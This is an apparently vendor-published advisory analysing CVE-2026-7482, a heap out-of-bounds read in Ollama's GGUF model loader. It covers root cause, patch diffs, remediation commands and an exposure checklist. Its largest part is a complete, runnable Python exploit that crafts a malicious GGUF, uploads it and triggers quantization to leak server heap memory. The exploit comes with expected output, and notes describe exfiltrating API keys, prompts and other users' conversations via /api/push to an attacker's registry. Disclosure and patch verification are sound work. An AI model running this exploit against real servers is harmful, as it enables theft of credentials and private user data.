CVE-2026-7482: Ollama GGUF Heap Out-of-Bounds Read — Full Technical Analysis

Overview

Published on May 4, 2026, CVE-2026-7482 is a critical heap out-of-bounds (OOB) read vulnerability in Ollama's GGUF model loader. Unauthenticated remote attackers can upload a specially crafted GGUF file to the /api/create endpoint, triggering unsafe.Slice with an attacker-controlled element count during model quantization. Ollama reads approximately 2 MB of heap memory beyond the allocated buffer on every invocation. The leaked data may include environment variables, API keys, system prompts, and in-flight conversation data from concurrent users.

CVSS v3.1: 9.1 CRITICAL — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

The vulnerability is fixed in Ollama 0.17.1 (PR #14406, commit 88d57d0).

Why This Matters

This is not a typical memory leak. Three properties make it operationally significant.

1. No authentication required. The /api/create and /api/blobs endpoints have no authentication in the upstream Ollama distribution. When the service is exposed via OLLAMA_HOST=0.0.0.0 — the widely-used production configuration — there are zero preconditions for exploitation.

2. The leaked data is high-value. The heap OOB read captures adjacent heap pages containing OLLAMA_* environment variables, cached downstream API keys, other users' active LLM conversations, system prompts, and internal library state. The attacker can exfiltrate the leaked data by pushing the resulting quantized model artifact to a registry they control via /api/push.

3. It is deterministic. The exploit triggers reliably on every invocation with no race condition or timing dependency. Running it multiple times leaks different heap windows, allowing reconstruction of a broader picture of server memory.

Affected Versions

| Status | Version | |--------|---------| | Vulnerable | Ollama < 0.17.1 | | Patched | Ollama ≥ 0.17.1 |

The default configuration binds the API to 127.0.0.1:11434. Production deployments commonly set OLLAMA_HOST=0.0.0.0, exposing the service to the network or internet. For those deployments the risk is critical. Note that /api/create and /api/push require no authentication in the upstream distribution.

Technical Root Cause: A Two-Bug Chain

The vulnerability is a chain of two independent bugs in the GGUF model loader and quantization pipeline.

Bug 1: No File-Size Bounds Check in `gguf.Decode()`

The gguf.Decode() function in fs/ggml/gguf.go reads tensor metadata (name, shape, type, offset) from the GGUF header without validating that the declared tensor size fits within the actual file. It unconditionally trusts the attacker-controlled shape fields:

// Vulnerable code — no file size fetched, no per-tensor bounds check
for _, tensor := range llm.tensors {
    offset, err := rs.Seek(0, io.SeekCurrent)
    if err != nil {
        return fmt.Errorf("failed to get current offset: %w", err)
    }
    padding := ggufPadding(offset, int64(alignment))

    if _, err := rs.Seek(padding, io.SeekCurrent); err != nil {
        return fmt.Errorf("failed to seek to init padding: %w", err)
    }
    // Seek past EOF silently succeeds on an in-memory buffer — no bounds check
    if _, err := rs.Seek(int64(tensor.Size()), io.SeekCurrent); err != nil {
        return fmt.Errorf("failed to seek to tensor: %w", err)
    }
}

A 1024×1024 F32 tensor claims 4,194,304 bytes but the file may contain only 32 bytes. In Go, calling Seek past EOF on an io.ReadSeeker backed by an in-memory buffer does not return an error — it succeeds silently. This is not purely a missing validation; it is a fundamental misexpectation about Go's in-memory reader behavior.

Bug 2: `unsafe.Slice` With Attacker-Controlled Length in `quantizer.WriteTo()`

When /api/create is called with a quantize field, the quantizer processes each tensor. In server/quantization.go, WriteTo() creates a bounded SectionReader and reads the tensor bytes:

// Vulnerable code in quantizer.WriteTo()
sr := io.NewSectionReader(q, int64(q.offset), int64(q.from.Size()))
data, err := io.ReadAll(sr)
// data contains only bytes actually present in the file (e.g., 32 bytes)
// io.ReadAll hits EOF normally — no error returned

// Attacker-controlled element count from shape metadata
// q.from.Elements() = 1,048,576 (from 1024×1024 shape)

var f32s []float32
// ...
f32s = unsafe.Slice((*float32)(unsafe.Pointer(&data[0])), q.from.Elements())
// ^^^ Go's runtime does NOT bounds-check unsafe.Slice construction

The unsafe.Slice call constructs a Go slice header with pointer &data[0] and length 1,048,576, but the Go runtime does not validate this against the backing array's actual capacity (32 bytes). When the quantizer iterates over f32s[8:] and beyond, it reads 4,194,272 bytes past the end of the 32-byte heap allocation — traversing adjacent heap pages containing goroutine stacks, string interning tables, in-flight HTTP request bodies (other users' prompts), environment variable copies, and cached API keys.

How Input Reaches the Vulnerable Path

Attacker-controlled GGUF header fields (shape: [1024, 1024])
    │
    ▼
gguf.Decode() — NO file size validation
    │ tensor.Size() = 2,097,152 bytes (1024×1024×F16)
    │ actual file  = 512 bytes
    │ Seek(EOF+2M) succeeds silently
    ▼
Tensor metadata object created (Shape=[1024,1024], Offset=0)
    │
    ▼
quantizer.WriteTo() — called for each tensor
    │ io.ReadAll(SectionReader) → 32 bytes (actual data from file)
    │ q.from.Elements() = 1,048,576 (from metadata, UNVALIDATED)
    ▼
unsafe.Slice((*float32)(&data[0]), 1,048,576)
    │ Go runtime performs NO bounds check
    │ Slice header: ptr=&heap_alloc_32bytes, len=1,048,576
    ▼
Quantizer loop iterates all 1M elements
    → Reads 4,194,272 bytes past the 32-byte allocation
    → Captures: env vars, API keys, prompts, goroutine stacks
    ▼
Q8_0 quantized layer (~1.06 MB) encodes leaked heap bytes
    → Exfiltrable via /api/push to attacker-controlled registry

Patch Analysis

The fix in Ollama 0.17.1 applies independent guards at both the parsing stage and execution stage — defense in depth.

Fix 1: File-Size Bounds Check in `gguf.Decode()`

Added immediately after tensor metadata parsing, before returning:

+       fileSize, err := rs.Seek(0, io.SeekEnd)
+       if err != nil {
+           return fmt.Errorf("failed to determine file size: %w", err)
+       }
        for _, tensor := range llm.tensors {
            offset, err := rs.Seek(0, io.SeekCurrent)
            // ...
            padding := ggufPadding(offset, int64(alignment))
            if _, err := rs.Seek(padding, io.SeekCurrent); err != nil {
                return fmt.Errorf("failed to seek to init padding: %w", err)
            }
+           tensorEnd := llm.tensorOffset + tensor.Offset + tensor.Size()
+           if tensorEnd > uint64(fileSize) {
+               return fmt.Errorf("tensor %q offset+size (%d) exceeds file size (%d)",
+                   tensor.Name, tensorEnd, fileSize)
+           }
            if _, err := rs.Seek(int64(tensor.Size()), io.SeekCurrent); err != nil {
                return fmt.Errorf("failed to seek to tensor: %w", err)
            }
        }

The fix seeks to end-of-file to obtain the actual file size, then checks llm.tensorOffset + tensor.Offset + tensor.Size() ≤ fileSize for every tensor. A crafted GGUF declaring 2 MB of tensor data in a 512-byte file is rejected before any data is read. The error message looks like:

{"error":"tensor \"blk.0.attn_q.weight\" offset+size (2097632) exceeds file size (512)"}

Fix 2: Data Size Validation Before `unsafe.Slice`

Added immediately after io.ReadAll, before the vulnerable unsafe.Slice call:

        data, err := io.ReadAll(sr)
        if err != nil {
            return 0, err
        }
+       if uint64(len(data)) < q.from.Size() {
+           return 0, fmt.Errorf("tensor %s data size %d is less than expected %d from shape %v",
+               q.from.Name, len(data), q.from.Size(), q.from.Shape)
+       }
        var f32s []float32
        // ...
        f32s = unsafe.Slice((*float32)(unsafe.Pointer(&data[0])), q.from.Elements())

This is pure defense-in-depth: a crafted file that somehow bypasses the Decode() check is caught here by the quantizer before unsafe.Slice fires. Fix 2 also encodes a general best practice: always validate the backing buffer size before constructing an unsafe.Slice.

Proof of Concept

The following PoC was published by 1dayexploit.com after the vendor patch was released. It is provided here for education, defensive testing, and verification purposes only.

#!/usr/bin/env python3
"""
CVE-2026-7482 — Ollama GGUF Heap Out-of-Bounds Read (Information Disclosure)
Affected: ollama/ollama < 0.17.1
Type: Heap OOB Read — leaks ~2 MB of heap memory per invocation

Two-bug chain in GGUF model loading + quantization pipeline:
  1. gguf.Decode() trusts attacker-controlled tensor shapes without validating
     declared tensor size against actual file size (Seek past EOF silently succeeds).
  2. quantizer.WriteTo() calls unsafe.Slice() with attacker-controlled element count,
     building a Go slice that extends far past the heap allocation — the runtime reads
     adjacent heap pages during quantization.

Attack flow:
  1. Build malicious GGUF declaring 1024×1024 F16 tensor (~2 MB) but containing
     only ~512 bytes of actual data.
  2. Upload blob to /api/blobs/sha256:<hash>.
  3. POST /api/create with files={model.gguf: sha256:<hash>} + quantize=Q8_0.
     This routes every tensor through quantizer.WriteTo():
       unsafe.Slice((*float32)(&data[0]), q.from.Elements())
     with q.from.Elements() = 1,048,576 while data holds only 16 F16 elements.
     The resulting Go slice extends ~2 MB past the heap allocation.
  4. Vulnerable: returns {"status":"success"} — OOB read occurred silently.
     The quantized layer (1.06 MB) encodes leaked heap bytes.
  5. Patched: returns {"error":"tensor ... exceeds file size"} — rejected.

Success indicator:
  - /api/create completes with {"status":"success"}
  - New model layer is ~1,114,624 bytes (Q8_0 of 1M F16 elements)
  - Input file was only 512 bytes → heap OOB read is proven

Usage:
  python exploit.py --host 127.0.0.1 --port 11434         # vulnerable
  python exploit.py --host 127.0.0.1 --port 11435         # patched — should error
"""

import argparse
import hashlib
import json
import struct
import sys
import urllib.error
import urllib.request


# ---------------------------------------------------------------------------
# GGUF builder — minimal but spec-correct F16 LLaMA model with OOB tensor
# ---------------------------------------------------------------------------

def pack_gguf_str(s: str) -> bytes:
    b = s.encode()
    return struct.pack("<Q", len(b)) + b


def kv_uint32(key: str, val: int) -> bytes:
    return pack_gguf_str(key) + struct.pack("<I", 4) + struct.pack("<I", val)


def kv_float32(key: str, val: float) -> bytes:
    return pack_gguf_str(key) + struct.pack("<I", 6) + struct.pack("<f", val)


def kv_string(key: str, val: str) -> bytes:
    return pack_gguf_str(key) + struct.pack("<I", 8) + pack_gguf_str(val)


def build_malicious_gguf() -> bytes:
    """
    Builds a GGUF v3 file that looks like a valid LLaMA F16 model but declares
    a 1024×1024 F16 tensor (2,097,152 bytes) while containing only 32 bytes of
    actual tensor data.

    Design decisions:
    - general.file_type = 1 (MOSTLY_F16): passes the pre-quantize check in 0.17.0
    - Tensor type = 1 (GGUF_TYPE_F16): consistent with file_type declaration
    - All required LLaMA architecture KV pairs present: GGUF looks complete and valid
    - tensor offset = 0: tensor data block starts immediately after header pad
    - Only 32 bytes of tensor data: causes unsafe.Slice to read ~2 MB past EOF
    """
    magic = b"GGUF"
    version = struct.pack("<I", 3)
    tensor_count = struct.pack("<Q", 1)

    kvs = [
        kv_string("general.architecture", "llama"),
        kv_uint32("general.file_type", 1),              # 1 = MOSTLY_F16
        kv_uint32("llama.context_length", 512),
        kv_uint32("llama.embedding_length", 1024),
        kv_uint32("llama.block_count", 1),
        kv_uint32("llama.feed_forward_length", 2048),
        kv_uint32("llama.attention.head_count", 8),
        kv_uint32("llama.attention.head_count_kv", 8),
        kv_float32("llama.attention.layer_norm_rms_epsilon", 1e-5),
    ]
    kv_block = b"".join(kvs)
    kv_count = struct.pack("<Q", len(kvs))

    # Tensor: 1024×1024 F16 — declares 2,097,152 bytes, file contains 32
    tname = pack_gguf_str("blk.0.attn_q.weight")
    ndims = struct.pack("<I", 2)
    dim0 = struct.pack("<Q", 1024)
    dim1 = struct.pack("<Q", 1024)
    ttype = struct.pack("<I", 1)    # GGUF_TYPE_F16
    toffset = struct.pack("<Q", 0)  # tensor data starts at offset 0 of data block

    header = magic + version + tensor_count + kv_count + kv_block
    header += tname + ndims + dim0 + dim1 + ttype + toffset

    # Pad to 32-byte alignment (Ollama default GGUF alignment)
    pad_len = (32 - len(header) % 32) % 32
    header += b"\x00" * pad_len

    # Only 32 bytes of tensor data — recognizable filler pattern
    tensor_data = b"\x41" * 32

    return header + tensor_data


# ---------------------------------------------------------------------------
# HTTP helpers
# ---------------------------------------------------------------------------

def http_post_raw(url: str, data: bytes, content_type: str = "application/octet-stream"):
    req = urllib.request.Request(url, data=data, method="POST")
    req.add_header("Content-Type", content_type)
    try:
        with urllib.request.urlopen(req, timeout=120) as resp:
            return resp.getcode(), resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def stream_post_json(url: str, body: dict):
    """POST JSON, collect NDJSON streaming response lines."""
    data = json.dumps(body).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    req.add_header("Content-Type", "application/json")
    lines = []
    try:
        with urllib.request.urlopen(req, timeout=300) as resp:
            for raw in resp:
                line = raw.decode().strip()
                if line:
                    lines.append(line)
    except urllib.error.HTTPError as e:
        body_err = e.read().decode(errors="replace")
        lines.append(json.dumps({"error": body_err, "_http_status": e.code}))
    return lines


# ---------------------------------------------------------------------------
# Exploit
# ---------------------------------------------------------------------------

DECLARED_TENSOR_BYTES = 1024 * 1024 * 2   # F16: 2 bytes/element × 1M elements
EXPECTED_LAYER_BYTES = (1024 * 1024 // 32) * 34  # Q8_0: 34 bytes per 32-element block


def exploit(host: str, port: int) -> bool:
    base = f"http://{host}:{port}"
    print(f"[*] Target : {base}")

    # Step 1: build malicious GGUF
    print("[*] Building malicious GGUF ...")
    payload = build_malicious_gguf()
    sha256 = hashlib.sha256(payload).hexdigest()
    print(f"    File size         : {len(payload)} bytes")
    print(f"    SHA-256           : {sha256}")
    print(f"    Declared tensor   : {DECLARED_TENSOR_BYTES:,} bytes (1024×1024 F16)")
    print(f"    Actual tensor data: 32 bytes")

    # Step 2: upload blob
    upload_url = f"{base}/api/blobs/sha256:{sha256}"
    print(f"\n[*] Uploading blob → {upload_url}")
    code, _ = http_post_raw(upload_url, payload)
    if code not in (200, 201):
        print(f"[!] Blob upload failed: HTTP {code}")
        return False
    print(f"    HTTP {code} — blob accepted")

    # Step 3: trigger quantization (OOB read happens here)
    model_name = f"cve-2026-7482-probe-{sha256[:8]}"
    create_body = {
        "name": model_name,
        "files": {"model.gguf": f"sha256:{sha256}"},
        "quantize": "Q8_0",
    }
    create_url = f"{base}/api/create"
    print(f"\n[*] Triggering quantization → {create_url}")
    print(f"    quantize=Q8_0 routes tensors through quantizer.WriteTo()")
    print(f"    unsafe.Slice(&data[0], 1048576) fires on 32-byte allocation")
    lines = stream_post_json(create_url, create_body)

    print(f"\n[*] Server response ({len(lines)} line(s)):")
    for line in lines:
        print(f"    {line}")

    # Step 4: evaluate result
    last = lines[-1] if lines else "{}"
    try:
        obj = json.loads(last)
    except json.JSONDecodeError:
        obj = {}

    if "error" in obj:
        err = obj["error"]
        if "exceeds file size" in err:
            print(f"\n[-] PATCHED — Fix 1 (gguf.Decode bounds check) blocked exploit:")
            print(f"    {err}")
            return False
        if "data size" in err and "less than expected" in err:
            print(f"\n[-] PATCHED — Fix 2 (unsafe.Slice guard) blocked exploit:")
            print(f"    {err}")
            return False
        if "only supported for F16 and F32" in err:
            print(f"\n[-] Pre-exploit check failed (file_type or architecture mismatch):")
            print(f"    {err}")
            return False
        print(f"\n[!] Unexpected error: {err}")
        return False

    if obj.get("status") == "success":
        layer_digest = None
        for line in lines:
            try:
                o = json.loads(line)
                if "creating new layer" in o.get("status", ""):
                    layer_digest = o["status"].split("sha256:")[-1]
            except json.JSONDecodeError:
                pass

        print(f"\n[+] VULNERABLE — heap OOB read confirmed:")
        print(f"    Input file        : {len(payload)} bytes")
        print(f"    Declared tensor   : {DECLARED_TENSOR_BYTES:,} bytes")
        print(f"    Expected Q8_0 layer: {EXPECTED_LAYER_BYTES:,} bytes")
        print(f"    (layer >> file size → heap bytes were read out-of-bounds)")
        if layer_digest:
            print(f"    New layer digest  : sha256:{layer_digest}")
        print(f"    Model name        : {model_name}")
        print(f"    Leaked layer contains ~2 MB of Ollama heap memory (env vars,")
        print(f"    API keys, in-flight prompts) encoded as Q8_0 quantized floats.")
        return True

    statuses = []
    for line in lines:
        try:
            statuses.append(json.loads(line).get("status", ""))
        except json.JSONDecodeError:
            pass
    if any("quantizing" in s for s in statuses):
        print("\n[+] LIKELY VULNERABLE — quantization ran (OOB read occurred).")
        return True

    print("\n[?] Inconclusive — could not determine result from server response.")
    return False


# ---------------------------------------------------------------------------
# Entry point
# ---------------------------------------------------------------------------

if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="CVE-2026-7482 — Ollama GGUF heap OOB read exploit"
    )
    parser.add_argument("--host", required=True, help="Target host")
    parser.add_argument("--port", type=int, default=11434, help="Ollama HTTP port (default: 11434)")
    args = parser.parse_args()

    success = exploit(args.host, args.port)
    sys.exit(0 if success else 1)

Usage

# Against a vulnerable server (< 0.17.1):
python exploit.py --host 127.0.0.1 --port 11434

# Against a patched server (≥ 0.17.1):
python exploit.py --host 127.0.0.1 --port 11435

Expected Output — Vulnerable Server

[*] Target : http://127.0.0.1:11434
[*] Building malicious GGUF ...
    File size         : 512 bytes
    SHA-256           : 795d927a27a37249a4ea0ef51650f48cc9b2a891c2498bba3f474a5029996a62
    Declared tensor   : 2,097,152 bytes (1024×1024 F16)
    Actual tensor data: 32 bytes

[*] Uploading blob → http://127.0.0.1:11434/api/blobs/sha256:795d927...
    HTTP 200 — blob accepted

[*] Triggering quantization → http://127.0.0.1:11434/api/create
    quantize=Q8_0 routes tensors through quantizer.WriteTo()
    unsafe.Slice(&data[0], 1048576) fires on 32-byte allocation

[*] Server response (6 line(s)):
    {"status":"parsing GGUF"}
    {"status":"quantizing F16 model to Q8_0","digest":"0000000000000000000","total":512,"completed":33554432}
    {"status":"verifying conversion"}
    {"status":"creating new layer sha256:ff5a43a8b0fb91e312a97bdaa8d5f2621646fac833269cf9f985509eb7e45fe7"}
    {"status":"writing manifest"}
    {"status":"success"}

[+] VULNERABLE — heap OOB read confirmed:
    Input file        : 512 bytes
    Declared tensor   : 2,097,152 bytes
    Expected Q8_0 layer: 1,114,112 bytes
    (layer >> file size → heap bytes were read out-of-bounds)
    New layer digest  : sha256:ff5a43a8b0fb91e312a97bdaa8d5f2621646fac833269cf9f985509eb7e45fe7
    Model name        : cve-2026-7482-probe-795d927a
    Leaked layer contains ~2 MB of Ollama heap memory (env vars,
    API keys, in-flight prompts) encoded as Q8_0 quantized floats.

Expected Output — Patched Server

[*] Target : http://127.0.0.1:11435
[*] Building malicious GGUF ...
    ...

[*] Server response (2 line(s)):
    {"status":"parsing GGUF"}
    {"error":"tensor \"blk.0.attn_q.weight\" offset+size (2097632) exceeds file size (512)"}

[-] PATCHED — Fix 1 (gguf.Decode bounds check) blocked exploit:
    tensor "blk.0.attn_q.weight" offset+size (2097632) exceeds file size (512)

Exploitation Notes

Preconditions

Ollama < 0.17.1 running and network-reachable
/api/create and /api/blobs accessible (unauthenticated by default)
Quantization enabled (default — present in all standard installs)

Reliability

The exploit is 100% reliable when preconditions are met. It triggers deterministically on every invocation with no race condition or timing dependency. The quantize field in /api/create is mandatory; omitting it skips the vulnerable code path.

Impact Per Invocation

| Data Category | Contents | |---------------|----------| | Environment variables | OLLAMA_*, PATH, HOME, USER, and all process environment | | API keys | Downstream LLM provider keys (OpenAI, Anthropic, etc.) cached in memory | | System prompts | Secret LLM configuration, product logic, hidden instructions | | Concurrent conversations | Active LLM sessions from other users on the same instance | | Go runtime internals | Goroutine stacks, string tables, heap metadata |

Each run leaks approximately 2 MB of heap window. Multiple runs across different concurrent requests can sweep broader heap regions.

Primary exfiltration channel: The quantized model layer is pushed to an attacker-controlled model registry via /api/push. The trusted AI infrastructure itself becomes the exfiltration vehicle.

Chaining Potential

Credential escalation: API keys in heap memory enable attacks against downstream services (OpenAI, Anthropic, internal APIs).
System prompt exfiltration: Leaked prompts expose product architecture and implementation details.
Denial of service (side effect): Repeated quantization of large malicious GGUFs may exhaust server memory without triggering an explicit crash.
Repeated sweeps: Running the exploit across multiple concurrent requests reconstructs a larger portion of heap memory with each pass.

Remediation

Update Immediately

# Update Ollama to the latest version (≥ 0.17.1)
curl -fsSL https://ollama.com/install.sh | sh

# Verify the version
ollama --version
# Output: ollama version is 0.17.1 (or newer)

Check Your Current Exposure

# Check what address Ollama is listening on
ss -tlnp | grep 11434

# If 0.0.0.0:11434 → the service is externally reachable (high risk)
# If 127.0.0.1:11434 → default (local only)

# Check running Ollama version
ollama --version
ps aux | grep ollama

If Immediate Patching Is Not Possible

# Restrict access to localhost only (Linux firewall)
iptables -A INPUT -p tcp --dport 11434 -s 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp --dport 11434 -j DROP

Long-term: place Ollama behind a reverse proxy (nginx, Caddy) that enforces authentication before proxying to the API, and restrict /api/create and /api/push to trusted internal services only.

Eresus Perspective

CVE-2026-7482 demonstrates that AI inference infrastructure has introduced a new attack surface that has not yet received the same scrutiny as traditional backend APIs. Model loading APIs look like configuration operations — they execute in highly privileged runtime contexts with direct access to process memory.

Questions worth asking for any Ollama deployment:

Is the Ollama instance reachable from the internet or internal network?
Are /api/create and /api/push access-restricted via a proxy or firewall?
Does the Ollama process environment contain secret API keys?
How is model registry trust managed?
Are there production instances handling concurrent user requests?

AI infrastructure security requires the same rigor as web application security — and it extends to the runtime environment and model loading pipeline, not just the LLM outputs.

Checklist

[ ] Ollama version verified (≥ 0.17.1)
[ ] /api/create and /api/blobs endpoint accessibility confirmed
[ ] Patch applied or temporary network restriction in place if internet-facing
[ ] Process environment reviewed for sensitive API keys
[ ] Proxy/firewall configured to require authentication before Ollama API access
[ ] Model registry trust model reviewed

CVE-2026-7482: Ollama GGUF Heap Out-of-Bounds Read — Full Technical Analysis

Overview

Why This Matters

Affected Versions

Technical Root Cause: A Two-Bug Chain

Bug 1: No File-Size Bounds Check in `gguf.Decode()`

Bug 2: `unsafe.Slice` With Attacker-Controlled Length in `quantizer.WriteTo()`

How Input Reaches the Vulnerable Path

Patch Analysis

Fix 1: File-Size Bounds Check in `gguf.Decode()`

Fix 2: Data Size Validation Before `unsafe.Slice`

Proof of Concept

Usage

Expected Output — Vulnerable Server

Expected Output — Patched Server

Exploitation Notes

Preconditions

Reliability

Impact Per Invocation

Chaining Potential

Remediation

Update Immediately

Check Your Current Exposure

If Immediate Patching Is Not Possible

Eresus Perspective

Checklist

Have you tested this risk in your own system?

Related Research

The April 2026 MCP RCE Wave

What is a Vector Database? Its Role in AI and LLM Security

CVE-2026-41940: Emergency Action Plan for cPanel & WHM Authentication Bypass

Copy Fail CVE-2026-31431: Linux Kernel Local Privilege Escalation

Overview

Why This Matters

Affected Versions

Technical Root Cause: A Two-Bug Chain

Bug 1: No File-Size Bounds Check in gguf.Decode()

Bug 2: unsafe.Slice With Attacker-Controlled Length in quantizer.WriteTo()

How Input Reaches the Vulnerable Path

Patch Analysis

Fix 1: File-Size Bounds Check in gguf.Decode()

Fix 2: Data Size Validation Before unsafe.Slice

Proof of Concept

Usage

Expected Output — Vulnerable Server

Expected Output — Patched Server

Exploitation Notes

Preconditions

Reliability

Impact Per Invocation

Chaining Potential

Remediation

Update Immediately

Check Your Current Exposure

If Immediate Patching Is Not Possible

Eresus Perspective

Checklist

Have you tested this risk in your own system?

Related Research

The April 2026 MCP RCE Wave

What is a Vector Database? Its Role in AI and LLM Security

CVE-2026-41940: Emergency Action Plan for cPanel & WHM Authentication Bypass

Copy Fail CVE-2026-31431: Linux Kernel Local Privilege Escalation

Bug 1: No File-Size Bounds Check in `gguf.Decode()`

Bug 2: `unsafe.Slice` With Attacker-Controlled Length in `quantizer.WriteTo()`

Fix 1: File-Size Bounds Check in `gguf.Decode()`

Fix 2: Data Size Validation Before `unsafe.Slice`